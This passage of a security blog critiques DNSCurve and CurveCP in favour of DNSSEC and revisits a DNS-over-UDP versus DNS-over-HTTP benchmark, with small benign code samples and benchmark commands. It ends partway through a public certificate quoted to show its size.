All caches have a characteristic known as the hit rate.  For every query that comes in, what are the chances that it will require a lookup to a remote authoritative server, vs. being serviceable from the cache?  A hit rate of 50% would imply a 2x increase in load.  75% would imply 4x.  87.5%?  8x.
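
For the record, the arithmetic behind those multipliers is just this:

def load_multiplier(hit_rate):
    # if a fraction hit_rate of queries never leaves the cache, removing the
    # cache multiplies authoritative-server load by 1 / (1 - hit_rate)
    return 1.0 / (1.0 - hit_rate)

for rate in (0.50, 0.75, 0.875, 0.99):
    print(f"{rate:.1%} hit rate -> {load_multiplier(rate):.0f}x the authoritative load")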

Inverting the math, for the load differential to be just 15%, that would mean only about 13% of queries were being hosted from local cache.  Do we, in fact, see a 13% hit rate?  Let’s see what actual operations people say about their name servers:

In percentages, that’s 80 to 85% hits… There, too, you end up a bit above 80%.
–XS4ALL, a major Dutch ISP

I’ve attached a short report from a couple of POP’s at a mid-sized (3-4 M subs) ISP.  It’s just showing a couple of hours from earlier this fall (I kind of chose it at random).

It’s extremely consistent across a number of different sites that I checked (not the 93%, but 85-90% cache hits): 0.93028, 0.92592, 0.93094, 0.93061, 0.92741
–Major DNS supplier

I don’t have precise cache hit rates for you, but I can give you this little fun tidbit. If you have a 2-tier cache, and the first tier is tiny (only a couple hundred entries), then you’ll handle close to 50% of the queries with the first cache…

Actually, those #s are old. We’re now running a few K first cache, and have a 70%+ hit rate there.
–Major North American ISP

So, essentially, unfiltered consensus hit rate is about 80-90%, which puts the load increase at 5x-10x in general.  Quite a bit less than the 100x I was worried about, right?  Well, let’s look at one last dataset:

Dec 27 03:30:25 solaria pdns_recursor[26436]: stats: 11133 packet cache entries, 99% packet cache hits
Dec 27 04:00:26 solaria pdns_recursor[26436]: stats: 17884 packet cache entries, 99% packet cache hits
Dec 27 04:30:28 solaria pdns_recursor[26436]: stats: 22522 packet cache entries, 99% packet cache hits
–Network at 27th Chaos Communication Congress

Well, there’s our 100x numbers. At least (possibly more than) 99% of requests to 27C3’s most popular name server were hosted out of cache, rather than spawning an authoritative lookup.

Of course, it’s interesting to know what’s going on.  This quote comes from an enormous supplier of DNS resolutions.

Facebook loads resources from dynamically (seemingly) created subdomains. I’d guess for alexa top 10,000 hit rate is 95% or more. But for other popular domains like Facebook, absent a very large cache, hit rate will be exceptionally low. And if you don’t discriminate cache policy by zone, RBLs will eat your entire cache, moving hit rate very very low.
–Absolutely Enormous Resolution Supplier

Here’s where it becomes clear that there are domains that choose to evade caching — they’ve intentionally engineered their systems to emit low TTLs and/or randomized names, so that requestors can get the most up to date records. That’s fine, but those very nodes are directly impacting the hitrate — meaning your average authoritative is really being saved even more load by the existence of the DNS caching layer.

It gets worse: As Paul Wouters points out, there is not a 1-to-1 relationship between cache misses and further queries. He writes:

You’re forgetting the chain reaction. If there is a cache miss, the server has to do much more than 1 query. It has to look up NS records, A records, perhaps from parents (perhaps cached) etc. One cache miss does not equal one missed cache hit!

To the infrastructure, every local endpoint cache hit means saving a handful of lookups.

That 99% cache hit rate looks even worse now. Looking at the data, 100x or even 200x doesn’t seem quite so wild, at least compared to the fairly obviously incorrect estimation of 1.15x.

Actually, when you get down to it, the greatest recipients of traffic boost are going to be nodes with a large number of popular domains that are on high TTLs, because those are precisely what:

a) Get resolved by multiple parties, and
b) Stay in cache, suppressing further resolution

Yeah, so that looks an awful lot like records hosted at the TLDs. Somehow I don’t think they’re going to deploy DNSCurve anytime soon.

(And for the record, I’m working on figuring out the exact impact of DNSCurve on each of the TLDs. After all, data beats speculation.)

[UPDATE: DJB challenges this section, citing local caching effects. More info here.]


DNSCurve requires the TLDs to use online signing

DNSSEC lets you choose:  Online signing, with its ease of use and extreme flexibility.  Or offline signing, with the ability to keep keying material in very safe places.

A while back, I had the pleasure of being educated in the finer points of DNS key risk management, by Robert Seastrom of Afilias (they run .org).  Let’s just say there are places you want to be able to distribute DNS traffic, without actually having “the keys to the kingdom” physically deployed.  As Paul Wouters observed:

Do you know how many instances of rootservers there are? Do you really want that key to live in 250+ places at once? Hell no!

DNSSEC lets you choose how widely to distribute your key material.  DNSCurve does not.


DNSCurve, even with Curve25519, has some CPU/Memory Performance Issues

Yes, Curve25519 is fast.  But nothing in computers is “instantaneous”, as DJB repeatedly insisted Curve25519 is at 27C3.  A node that’s doing 5500 Curve25519 operations a second is likely capable of 50,000 to 100,000 DNS queries per second.  We’re basically eating 5 to 10 qps per Curve25519 op — which makes sense, really, since no asymmetric crypto is ever going to be as easy as burping something out on the wire.

DJB gets around this by presuming large scale caching.  But while DNSSEC can cache by record — with cache effectiveness at around 70% for just a few thousand entries, according to the field data — DNSCurve has to cache by session.  Each peer needs to retain a key, and the key must be looked up.

Random lookups into a 500M-record database (as DJB cites for .com), on the required millisecond scale, aren’t actually all that easy.  Not impossible, of course, but messy.


DNSCurve increases query latency

This is unavoidable.  Caches allow entire trust chains to be aggregated on network links near users.  Even though DNSSEC hasn’t yet built out a mechanism for a client to retrieve that chain in a single query, there’s nothing stopping us on a protocol level from really leveraging local caches.

DNSCurve can never use these local caches.  Every query must round-trip between the host and each foreign server in the resolution chain — at least, if end to end trust is to be maintained.

(In the interest of fairness, there are modes of validating DNSSEC on endpoints that bypass local caches entirely and go straight to the root. Unbound, or libunbound as used in Phreebird, will do this by default. It’s important that the DNSSEC community be careful about this, or we’ll have the same fault I’m pointing out in DNSCurve.)


DNSCurve Also Can’t Sign For Its Delegations

If there’s one truly strange argument in DJB’s presentation, it’s on Page 39. Here, he complains that in DNSSEC, .org being signed doesn’t sign all the records underneath .org, like wikipedia.org.

Huh? Wikipedia.org is a delegation, an unsigned one at that. That means the only information that .org can sign is either:

1) Information regarding the next key to be used to sign wikipedia.org records, along with the next name server to talk to.
2) Proof there is no next key, and Wikipedia’s records are unsigned

That’s it. Those are the only choices, because Wikipedia’s IP addresses are not actually hosted by the .org server. DNSCurve either implements the exact same thing, or it’s totally undeployable, because without support for unsigned delegations 100% of your children must be signed in order for you to be signed. I can’t imagine DNSCurve has that limitation.


What About CurveCP?

I don’t hate CurveCP.  In fact, if there isn’t a CurveCP implementation out within a month, I’ll probably write one myself.  If I’ve got one complaint about what I’ve heard about it, it’s that it doesn’t have a lossy mode (trickier than you think — replay protection etc).

CurveCP is seemingly an IPsec clone, over which a TCP clone runs.  That’s not actually accurate.  See, our inability to do small and fast asymmetric cryptography has forced us to do all these strange things to IP, making stateful connections even when we just wanted to fire and forget a packet.  With CurveCP, if you know who you’re sending to, you can just fire and forget packets — the overhead, both in terms of effect on CPU and bandwidth, is actually quite affordable.

This is what I wanted for linkcat almost a decade ago!  There are some beautiful networking protocols that could be made with Curve25519.  CurveCP is but one.  The fact that CurveCP would run entirely in userspace is a bonus — controversial as this may be, the data suggests kernel bound APIs (like IPsec) have a lot more trouble in the field than usermode APIs (like TLS/HTTPS).

There is a weird thing with CurveCP, though. DJB is proposing tunneling it over 53/udp. He’s not saying to route it through DNS proper, i.e. shunting all of CurveCP into the weird formats you have to use when proxying off a name server. He just wants data to move over 53/udp, because he thinks it gets through firewalls easier. Now, I haven’t checked into this in at least six years, but back when I was all into tunneling data over DNS, I actually had to tunnel data over DNS, i.e. fully emulate the protocol. Application Layer Gateways for DNS are actually quite common, as they’re a required component of any captive portal. I haven’t seen recent data, but I’d bet a fair amount that random noise over 53/udp will actually be blocked on more networks than random noise over some higher UDP port.

This is not an inherent aspect of CurveCP, though, just an implementation detail.


HTTPS Has 99 Problems But Speed Ain’t One

Unfortunately, my appreciation of CurveCP has to be tempered by the fact that it does not, in fact, solve our problems with HTTPS.  DJB seems thoroughly convinced that the reason we don’t have widespread HTTPS is because of performance issues.  He goes so far as to cite Google, which displays less imagery to the user if they’re using https://encrypted.google.com.

Source Material is a beautiful thing.  According to Adam Langley, who’s actually the TLS engineer at Google:

If there’s one point that we want to communicate to the world, it’s that SSL/TLS is not computationally expensive any more. Ten years ago it might have been true, but it’s just not the case any more. You too can afford to enable HTTPS for your users.

In January this year (2010), Gmail switched to using HTTPS for everything by default. Previously it had been introduced as an option, but now all of our users use HTTPS to secure their email between their browsers and Google, all the time. In order to do this we had to deploy no additional machines and no special hardware. On our production frontend machines, SSL/TLS accounts for less than 1% of the CPU load, less than 10KB of memory per connection and less than 2% of network overhead. Many people believe that SSL takes a lot of CPU time and we hope the above numbers (public for the first time) will help to dispel that.

If you stop reading now you only need to remember one thing: SSL/TLS is not computationally expensive any more.

Given that Adam is actually the engineer who wrote the generic C implementation of Curve25519, you’d think DJB would listen to his unambiguous, informed guidance. But no, talk after talk, con after con, DJB repeats the assertion that performance is why HTTPS is poorly deployed — and thus, we should throw out everything and move to his faster crypto function.

(He also suggests that by abandoning HTTPS and moving to CurveCP, we will somehow avoid the metaphorical attacker who has the ability to inject one packet, but not many, and doesn’t have the ability to censor traffic.  That’s a mighty fine hair to split.  For a talk that is rather obsessed with the goofiness of thinking partial defenses are meaningful, this is certainly a creative new security boundary.  Also, non-existent.)

I mentioned earlier: Security is larger than cryptography. If you’ll excuse the tangent, it’s important to talk about what’s actually going on.


There Is No “On Switch” For HTTPS

The average major website is not one website — it is an agglomeration, barely held together with links, scripts, images, ads, APIs, pages, duct tape, and glue.

For HTTPS to work, everything (except, as is occasionally argued, images) must come from a secure source. It all has to be secure, at the exact same time, or HTTPS fails loudly, and appropriately.

At this point, anyone who’s ever worked at a large company understands exactly, to a T, why HTTPS deployment has been so difficult. Coordination across multiple units is tricky even when there’s money to be made. When there isn’t money — when there’s merely defense against customer data being lost — it’s a lot harder.

The following was written in 2007, and was not enough to make Google start encrypting:

‘The goal is to identify the applications being used on the network, but some of these devices can go much further; those from a company like Narus, for instance, can look inside all traffic from a specific IP address, pick out the HTTP traffic, then drill even further down to capture only traffic headed to and from Gmail, and can even reassemble emails as they are typed out by the user.‘

Now, far be it from me to speculate as to what actually moved Google towards HTTPS, but it would be my suspicion that this had something to do with it:

Google is now encrypting all Gmail traffic from its servers to its users in a bid to foil sniffers who sit in cafes, eavesdropping in on traffic passing by, the company announced Wednesday.

The change comes just a day after the company announced it might pull its offices from China after discovering concerted attempts to break into Gmail accounts of human rights activists.

There is a tendency to blame the business guys for things. If only they cared enough! As I’ve said before, the business guys have blown hundreds of millions on failed X.509 deployments. They cared enough. The problems with existing trust distribution systems are (and I think DJB would agree with me here) not just political, but deeply, embarrassingly technical as well.


HTTPS Certificate Management Is Still A Problem!

Once upon a time, I wanted to write a kernel module. This module would quietly and efficiently add a listener on 443/TCP, that was just a mirror of 80/TCP. It would be like stunnel, but at native speeds.

But what certificate would it emit?

See, in HTTP, the client declares the host it thinks it’s talking to, so the server can “morph” to that particular identity. But in HTTPS, the server declares the host it thinks it is, so the client can decide whether to trust it or not.

This has been a problem, a known problem, since the late nineties. They even built a spec, called SNI (Server Name Indication), that allowed the client to “hint” to the server what name it was looking for.
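
For what it’s worth, sending the hint is trivial on the client side these days. Here’s a sketch with Python’s standard ssl module, example.com being a placeholder:

import socket, ssl

context = ssl.create_default_context()
with socket.create_connection(("example.com", 443)) as raw:
    # server_hostname is the SNI hint: the server learns which name the client
    # wants before it has to choose a certificate to present
    with context.wrap_socket(raw, server_hostname="example.com") as tls:
        print(tls.getpeercert()["subject"])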

Didn’t matter. There’s still not enough adoption of SNI for servers to vhost based off of it. So, if you want to deploy TLS, you not only have to get everybody, across all your organizations and all your partners and all your vendors and all your clients to “flip the switch”, but you also have to get them to renumber their networks.

Those are three words a network engineer never, ever, ever wants to hear.

And we haven’t even mentioned the fact that acquiring certificates is an out-of-organization acquisition, requiring interactions with outsiders for every new service that’s offered. Empirically, this is a fairly big deal. Devices sure don’t struggle to get IP addresses — but the contortions required to get a globally valid certificate into a device shipped to a company are epic and frankly impossible. To say nothing of what happens when one tries to securely host from a CDN (Content Distribution Network)!

DNSSEC, via its planned mechanisms for linking names to certificate hashes, bypasses this entire mess.  A hundred domains can CNAME to the same host, with the same certificate, within the CDN.  On arrival, the vhosting from the encapsulated HTTP layer will work as normal.  My kernel module will work fine.

‘Bout time we fixed that!

So. When I say security is larger than cryptography — it’s not that I’m saying cryptography is small. I’m saying that security, actual effective security, requires being worried about a heck of a lot more failure modes than can fit into a one hour talk.


The Biggest Problem:  Zooko’s Triangle

I’ve saved my deepest concern for last.

I can’t believe DJB fell for Zooko’s Triangle.

So, I met Zooko about a decade ago.  I had no idea of his genius.  And yet, there he was, way back when, putting together the core of DJB’s talk at 27C3.  Zooko’s Triangle is a description of desirable properties of naming systems, of which only two can be implemented at any one time.  They are:

  1. Secure:  Only the actual owner of the name is found.
  2. Decentralized:  There is no “single point of failure” that everyone trusts to provide naming services
  3. Human Readable:  The name is such that humans can read it.

DJB begins by recapitulating Nyms, an idea that keeps coming up through the years:

“Nym” case: URL has a key!
Recognize magic number 123 in http://1238675309.twitter.com and extract key 8675309.
(Technical note: Keys are actually longer than this, but still fit into names.)

DJB shortens the names in his slides — and admits that he does this! But, man, they’re really ugly:

http://Z0z9dTWfhtGbQ4RoZ08e62lfUA5Db6Vk3Po3pP9Z8tM.twitter.com

I actually implemented something very similar in the part of Phreebird that links DNSSEC to the browser lock in your average web browser.

I didn’t invent this approach, though, and neither did DJB.  While I was personally inspired by the Self-Certifying File System, this is the “Secure and Decentralized — Not Human Readable” side of Zooko, so this shows up repeatedly.

For Phreebird, this was just a neat trick, something funny and maybe occasionally useful when interoperating with a config file or two.  It wasn’t meant to be used as anything serious.  Among other things, it has a fundamental UI problem — not simply that the names are hideous (though they are), but that they’ll necessarily be overridden.  People think bad security UI is random, like every once in a while the vapors come over a developer and he does something stupid.

No.  You can look at OpenSSH and say — keys will change over time, and users will have to have a way to override their cache.  You can look at curl and say — sometimes, you just have to download a file from an HTTPS link that has a bad cert.  There will be a user experience telling you not one, but two ways to get around certificate checking.

You can look at a browser and say, well, if a link to a page works but has the wrong certificate hash in the sending link, the user is just going to have to be prompted to see if they want to browse anyway.

It is tempting, then, to think bad security UI is inevitable, that there are no designs that could possibly avoid it.  But it is not the fact that keys change that forces an alert.  It’s that they change, without the legitimate administrator having a way to manage the change.  IP addresses change all the time, and DNS makes it totally invisible.  Everybody just gets the new IPs — and there’s no notification, no warnings, and certainly no prompting.

Random links smeared all over the net will prompt like little square Christmas ornaments.  Keys stored in DNS simply won’t.

So DJB says, don’t deploy long names, instead use normal looking domains like www. Then, behind the scenes, using the DNS aliasing feature known as CNAME, link www to the full Nym.

Ignore the fact that there are applications actually using the CNAME data for meaningful things. This is very scary, very dangerous stuff.  After all, you can’t just trust your network to tell you the keyed identity of the node you’re attempting to reach.  That’s the whole point — you know the identity, the network is untrusted. DJB has something that — if comprehensively deployed, all the way to the root — does this.  DNSCurve, down from the root, down from com, down to twitter.com would in fact provide a chain of trust that would allow www.twitter.com to CNAME to some huge ugly domain.

Whether or not it’s politically feasible (it isn’t), it is a scheme that could work. It is secure.  It is human readable. But it is not decentralized — and DJB is petrified of trusted third parties.

And this, finally, is when it all comes off the rails.  DJB suggests that all software could perhaps ship with lists of keys of TLDs — .com, .de, etc.  Of course, such lists would have to be updated.

Never did I think I’d see one of the worst ideas from DNSSEC’s pre-root-signed past recycled as a possibility.  That this idea was actually called the ITAR (Interim Trust Anchor Repository), and that DJB was advocating ITAR, might be the most surreal experience of 2010 for me.

(Put simply, imagine every device, every browser, every phone FTP’ing updates from some vendor maintained server. It was a terrible idea when DNSSEC suggested it, and even they only did so under extreme duress.)

But it gets worse.  For, at the end of it, DJB simply threw up his hands and said:

“Maybe P2P DNS can help.”

Now, I want to be clear (because I screwed this up at first):  DJB did not actually suggest retrieving key material from P2P DNS.  That’s good, because P2P DNS is the side of Zooko’s Triangle where you get decentralization and human readable names — but no security!  Wandering a cloud, asking if anyone knows the trusted key for Twitter, is an unimaginably bad idea.

No, he suggested some sort of split system, where you actually and seriously use URLs like http://Z0z9dTWfhtGbQ4RoZ08e62lfUA5Db6Vk3Po3pP9Z8tM.twitter.com to identify peers, but P2P DNS tells you what IPs to speak to them at.

What? Isn’t security important to you?

After an hour of hearing how bad DNSSEC must be, ending up here is…depressing.  In no possible universe are Nymic URLs a good idea for anything but wonky configuration entries.  DJB himself was practically apologizing for them. They’re not even a creative idea.


The Bottom Line:  It Really Is All About Key Management

No system can credibly purport to be solving the problems of authentication and encryption for anybody, let alone the whole Internet, without offering a serious answer to the question of Key Management.  To be blunt, this is the hard part. New transports and even new crypto are optimizations, possibly even very interesting ones. But they’re not where we’re bleeding.

The problem is that it’s very easy to give a node an IP address that anyone can route to, but very hard to give a node an identity that anybody can verify. Key Management — the creation, deletion, integration, and management of identities within and across organizational boundaries — this is where we need serious solutions.

Nyms are not a serious solution. Neither is some sort of strange half-TLD, half P2PDNS, split identity/routing hack. Solving key management is not actually optional. This is where the foundation of an effective solution must be found.

DNSSEC has a coherent plan for how keys can be managed across organizational boundaries — start at the root, delegate down, and use governance and technical constraints to keep the root honest. It’s worked well so far, or you wouldn’t be reading this blog post right now. There’s no question it’s not a perfect protocol — what is? — but the criticisms coming in from DJB are fairly weak (and unfairly old) in context, and the alternative proposed is sadly just smoke and mirrors without a keying mechanism.


DNSSEC Interlude 1: Curiosities of Benchmarking DNS over Alternate Transports

January 4, 2011

Short version:  DNS over TCP (or HTTP) is almost certainly not faster than DNS over UDP, for any definition of faster.  There was some data that supported a throughput interpretation of speed, but that data is not replicating under superior experimental conditions.  Thanks to Tom Ptacek for prodding me into re-evaluating my data.

Long version:

So one of the things I haven’t gotten a chance to write a diary entry about yet is the fact that when implementing end-to-end DNSSEC, there will be environments in which arbitrary DNS queries just aren’t an option.  In such environments, we will need to find a way to tunnel traffic.

Inevitably, this leads us to HTTP, the erstwhile “Universal Tunneling Protocol”.

Now, I don’t want to go ahead and write up this entire concern now.  What I do want to do is discuss a particular criticism of this concern — that HTTP, being run over TCP, would necessarily be too slow to function as a DNS transport.

I decided to find out.

I am, at my core, an empiricist.  It’s my belief that the security community runs a little too much on rumor and nowhere nearly enough on hard, repeatable facts.  So, I have a strong bias towards actual empirical results.

One has to be careful, though — as they say, data is not information, information is not knowledge, and knowledge is not wisdom.

So, Phreebird is built on top of libevent, a fairly significant piece of code that makes it much easier to write fast network services.  (Libevent essentially abstracts away the complex steps required to make modern kernel networking fast.)  Libevent supports UDP, TCP, and HTTP transports fairly elegantly, and even simultaneously, so I built each endpoint into Phreebird.

Then, I ran a simple benchmark.  From my Black Hat USA slides:

# DNS over UDP
./queryperf -d target2 -s 184.73.1.213 -l 10

Queries per second:   3278.676726 qps

# DNS over HTTP
ab -c 100 -n 10000 http://184.73.1.213/Rz8BAAABAAAAAAAAA3d3dwNjbm4DY29tAAABAAE=

Requests per second:    3910.13 [#/sec] (mean)
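
For the curious, that odd-looking URL is just the raw DNS query, base64-encoded into the path. A toy relay speaking this transport (nothing like Phreebird’s actual implementation; stdlib only, placeholder resolver, no error handling) looks roughly like this:

import base64, socket
from http.server import BaseHTTPRequestHandler, HTTPServer

RESOLVER = ("8.8.8.8", 53)   # placeholder upstream resolver

class DnsOverHttp(BaseHTTPRequestHandler):
    def do_GET(self):
        # the DNS query rides in the URL, base64-encoded
        encoded = self.path.rsplit("q=", 1)[-1].lstrip("/")
        query = base64.urlsafe_b64decode(encoded)
        with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as udp:
            udp.settimeout(2)
            udp.sendto(query, RESOLVER)
            answer, _ = udp.recvfrom(4096)
        self.send_response(200)
        self.send_header("Content-Length", str(len(answer)))
        self.end_headers()
        self.wfile.write(answer)

HTTPServer(("0.0.0.0", 8053), DnsOverHttp).serve_forever()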

Now, at Black Hat USA, the title of my immediate next slide was “Could be Wrong!”, with the very first bullet point being “Paul Vixie thinks I am”, and the second point being effectively “this should work well enough, especially if we can retrieve entire DNS chains over a single query”.  But, aside from a few raised eyebrows, the point didn’t get particularly challenged, and I dropped the skepticism from the talk.  I mean, there’s a whole bunch of crazy things going on in the DKI talk, I’ve got more important things to delve deeply into, right?

Heh.

Turns out there’s a fair number of things wrong with the observation.  First off, saying “DNS over HTTP is faster than DNS over UDP” doesn’t specify which definition of faster I’m referring to. There are two.  When I say a web server is fast, it’s perfectly reasonable for me to say “it can handle 50,000 queries per second, which is 25% faster than its competition”.  That is speed-as-throughput.  But it’s totally reasonable also to say “responses from this web server return in 50ms instead of 500ms”, which is speed-as-latency.

Which way is right?  Well, I’m not going to go mealy-mouthed here.  Speed-as-latency isn’t merely a possible interpretation, it’s the normal interpretation.  And of course, since TCP adds a round trip between client and server, whereas UDP does not, TCP couldn’t be faster (modulo hacks that reduced the number of round trips at the application layer, anyway).  What I should have been saying was that “DNS servers can push more traffic over HTTP than they can over UDP.”

Except that’s not necessarily correct either.

Now, I happen to be lucky.  I did indeed store the benchmarking data from my July 2010 experiment comparing UDP and HTTP DNS queries.  So I can show I wasn’t pulling numbers out of my metaphorical rear.  But I didn’t store the source code, which has long since been updated (changing the performance characteristics), and I didn’t try my tests on multiple servers of different performance quality.

I can’t go back in time and get the code back, but I can sure test Phreebird.  Here’s what we see on a couple of EC2 XLarges, after I’ve modified Phreebird to return a precompiled response rather than building packets on demand:

# ./queryperf -d bench -s x.x.x.x -l 10
Queries per second:   25395.728961 qps
# ab -c 1000 -n 100000 ‘http://x.x.x.x/.well-known/dns-http?v=1&q=wn0BAAABAAAAAAAABWJlbmNoBG1hcmsAAAEAAQ==’
Requests per second:    7816.82 [#/sec] (mean)

DNS over HTTP here is about 30% the performance of DNS over UDP.  Perhaps if I try some smaller boxes?

# ./queryperf -d bench -s pb-a.org -l 10
Queries per second:   7918.464171 qps
# ab -c 1000 -n 100000 ‘http://pb-a.org/.well-known/dns-http?v=1&q=wn0BAAABAAAAAAAABWJlbmNoBG1hcmsAAAEAAQ==’
Requests per second:    3486.53 [#/sec] (mean)

Well, we’re up to 44% of the speed, but that’s a far cry from 125%.  What’s going on?  Not sure; I didn’t store the original data.  There are a couple of other things wrong:

  1. This is a conflated benchmark.  I should have a very small, tightly controlled, correctly written test case server and client.  Instead, I’m borrowing demonstration code that’s trying to prove where DNSSEC is going, and stock benchmarkers.
  2. I haven’t checked whether Apache Bench (ab) is reusing sockets for multiple queries (I don’t think it is).  If it is, that would mean it was amortizing setup time across multiple queries, which would skew the data.
  3. I’m testing between two nodes on the same network (Amazon).  I should be testing across a worldwide cluster.  Planetlab calls.
  4. I’m testing between two nodes, period.  That means that the embarrassingly parallelizable problem that is opening up a tremendous number of TCP client sockets, is borne by only one kernel instead of some huge number.  I’m continuing to repeat this error on the new benchmarks as well.
  5. This was a seriously counterintuitive result, and as such bore a particular burden to be released with hard, replicable data (including a repro script).

Now, does this mean the findings are worthless?  No.  First, there’s no intention of moving all DNS over HTTP, just those queries that cannot be serviced via native transport.  Slower performance — by any definition — is superior to no performance at all.  Second, there was at least one case where DNS over HTTP was 25% faster.  I don’t know where it is, or what caused it.  Tom Ptacek supposes that the source of HTTP’s advantage was that my UDP code was hobbled (specifically, through some half-complete use of libevent).  That’s actually my operating assumption for now.
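
(As an aside, for readers wondering what “return a precompiled response rather than building packets on demand” looks like in practice: here’s a toy sketch of the idea in Python, using asyncio and dnspython.  Phreebird itself is C on libevent; this is only an illustration, and it only makes sense because every benchmark client asks the identical question.)

import asyncio
import dns.message, dns.rdatatype, dns.rrset

# Precompile one answer at startup, so the hot path does no packet building.
canned_query = dns.message.make_query("bench.mark", dns.rdatatype.A)
canned_response = dns.message.make_response(canned_query)
canned_response.answer.append(
    dns.rrset.from_text("bench.mark.", 300, "IN", "A", "127.0.0.1"))
CANNED = canned_response.to_wire()

class PrecompiledDNS(asyncio.DatagramProtocol):
    def connection_made(self, transport):
        self.transport = transport
    def datagram_received(self, data, addr):
        # Splice the client's query ID (first two bytes) into the canned
        # answer and fire it straight back.
        self.transport.sendto(data[:2] + CANNED[2:], addr)

async def main():
    loop = asyncio.get_running_loop()
    await loop.create_datagram_endpoint(
        PrecompiledDNS, local_addr=("0.0.0.0", 5353))
    await asyncio.Event().wait()  # serve forever

asyncio.run(main())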

Finally, and most importantly, as Andy Steingruebl tweets:

Most tests will prob show UDP faster, but that isn’t the point. Goal is to make TCP fast enough, not faster than UDP.

The web is many things; optimally designed for performance is not one of them.  There are many metrics by which we determine the appropriate technological solution.  Raw cycle-for-cycle performance is a good thing, but it ain’t the only thing (especially considering the number of problems which are very noticeably not CPU-bound).

True as that all is, I want to be clear. A concept was misunderstood, and even my “correct interpretation” wasn’t backed up by a more thorough and correct repetition of the experiment.  It was through the criticism of others (specifically, Tom Ptacek) that this came to light.  Thanks, Tom.

That’s science, folks.  It’s awesome, even when it’s inconvenient!

Categories: Security

The DNSSEC Diaries, Ch. 6: Just How Much Should We Put In DNS?

December 27, 2010 5 comments

Several years ago, I had some fun:  I streamed live audio, and eventually video, through the DNS.

Heh.  I was young, and it worked through pretty much any firewall.  (Still does, actually.)  It wasn’t meant to be a serious transport though.  DNS was not designed to traffic large amounts of data.  It’s a bootstrapper.

But then, we do a lot of things with protocols that we weren’t “supposed” to do.  Where do we draw the line?

Obviously DNS is not going to become the next great CDN hack (though I had a great trick for that too).  But there’s a real question:  How much data should we be putting into the DNS?

Somewhere between “only IP addresses, and only a small number”, and “live streaming video”, there’s an appropriate middle ground.  Hard to know where exactly that is.

There is a legitimate question of whether anything the size of a certificate should be stored in DNS.  Here is the size of Hotmail’s certificate, at the time of writing:

-----BEGIN CERTIFICATE-----
MIIHVTCCBj2gAwIBAgIKKykOkAAIAAHL8jANBgkqhkiG9w0BAQUFADCBizETMBEG
CgmSJomT8ixkARkWA2NvbTEZMBcGCgmSJomT8ixkARkWCW1pY3Jvc29mdDEUMBIG
CgmSJomT8ixkARkWBGNvcnAxFzAVBgoJkiaJk/IsZAEZFgdyZWRtb25kMSowKAYD
VQQDEyFNaWNyb3NvZnQgU2VjdXJlIFNlcnZlciBBdXRob3JpdHkwHhcNMTAxMTI0
MTYzNjQ1WhcNMTIxMTIzMTYzNjQ1WjBuMQswCQYDVQQGEwJVUzELMAkGA1UECBMC
V0ExEDAOBgNVBAcTB1JlZG1vbmQxEjAQBgNVBAoTCU1pY3Jvc29mdDEUMBIGA1UE
CxMLV2luZG93c0xpdmUxFjAUBgNVBAMTDW1haWwubGl2ZS5jb20wggEiMA0GCSqG
SIb3DQEBAQUAA4IBDwAwggEKAoIBAQDVCWje/SRDef6Sad95esXcZwyudwZ8ykCZ
lCTlXuyl84yUxrh3bzeyEzERtoAUM6ssY2IyQBdauXHO9f+ZEz09mkueh4XmD5JF
/NhpxdpPMC562NlfvfH/f+8KzKCPhPlkz4DwYFHsknzHvyiz2CHDNffcCXT+Bnrv
G8eEPbXckfEFB/omArae0rrJ+mfo9/TxauxyX0OsKv99d0WO0AyWY2/Bt4G+lSuy
nBO7lVSadMK/pAxctE+ZFQM2nq3G4o+L95HeuG4m5NtIJnZ/7dZwc8HuXuMQTluA
ZL9iqR8a24oSVCEhTFjm+iIvXAgM+fMrjN4jHHj0Vo/o0xQ1kJLbAgMBAAGjggPV
MIID0TALBgNVHQ8EBAMCBLAwHQYDVR0lBBYwFAYIKwYBBQUHAwIGCCsGAQUFBwMB
MHgGCSqGSIb3DQEJDwRrMGkwDgYIKoZIhvcNAwICAgCAMA4GCCqGSIb3DQMEAgIA
gDALBglghkgBZQMEASowCwYJYIZIAWUDBAEtMAsGCWCGSAFlAwQBAjALBglghkgB
ZQMEAQUwBwYFKw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFNHp09bqrsUO36Nc
1mQgHqt2LeFiMB8GA1UdIwQYMBaAFAhC49tOEWbztQjFQNtVfDNGEYM4MIIBCgYD
VR0fBIIBATCB/jCB+6CB+KCB9YZYaHR0cDovL21zY3JsLm1pY3Jvc29mdC5jb20v
cGtpL21zY29ycC9jcmwvTWljcm9zb2Z0JTIwU2VjdXJlJTIwU2VydmVyJTIwQXV0
aG9yaXR5KDgpLmNybIZWaHR0cDovL2NybC5taWNyb3NvZnQuY29tL3BraS9tc2Nv
cnAvY3JsL01pY3Jvc29mdCUyMFNlY3VyZSUyMFNlcnZlciUyMEF1dGhvcml0eSg4
KS5jcmyGQWh0dHA6Ly9jb3JwcGtpL2NybC9NaWNyb3NvZnQlMjBTZWN1cmUlMjBT
ZXJ2ZXIlMjBBdXRob3JpdHkoOCkuY3JsMIG/BggrBgEFBQcBAQSBsjCBrzBeBggr
BgEFBQcwAoZSaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraS9tc2NvcnAvTWlj
cm9zb2Z0JTIwU2VjdXJlJTIwU2VydmVyJTIwQXV0aG9yaXR5KDgpLmNydDBNBggr
BgEFBQcwAoZBaHR0cDovL2NvcnBwa2kvYWlhL01pY3Jvc29mdCUyMFNlY3VyZSUy
MFNlcnZlciUyMEF1dGhvcml0eSg4KS5jcnQwPwYJKwYBBAGCNxUHBDIwMAYoKwYB
BAGCNxUIg8+JTa3yAoWhnwyC+sp9geH7dIFPg8LthQiOqdKFYwIBZAIBCjAnBgkr
BgEEAYI3FQoEGjAYMAoGCCsGAQUFBwMCMAoGCCsGAQUFBwMBMIGuBgNVHREEgaYw
gaOCDyoubWFpbC5saXZlLmNvbYINKi5ob3RtYWlsLmNvbYILaG90bWFpbC5jb22C
D2hvdG1haWwubXNuLmNvbYINaG90bWFpbC5jby5qcIINaG90bWFpbC5jby51a4IQ
aG90bWFpbC5saXZlLmNvbYITd3d3LmhvdG1haWwubXNuLmNvbYINbWFpbC5saXZl
LmNvbYIPcGVvcGxlLmxpdmUuY29tMA0GCSqGSIb3DQEBBQUAA4IBAQC9trl32j6J
ML00eewSJJ+Jtcg7oObEKiSWvKnwVSmBLCg0bMoSCTv5foF7Rz3WTYeSKR4G72c/
pJ9Tq28IgBLJwCGqUKB8RpzwlFOB8ybNuwtv3jn0YYMq8G+a6hkop1Lg45d0Mwg0
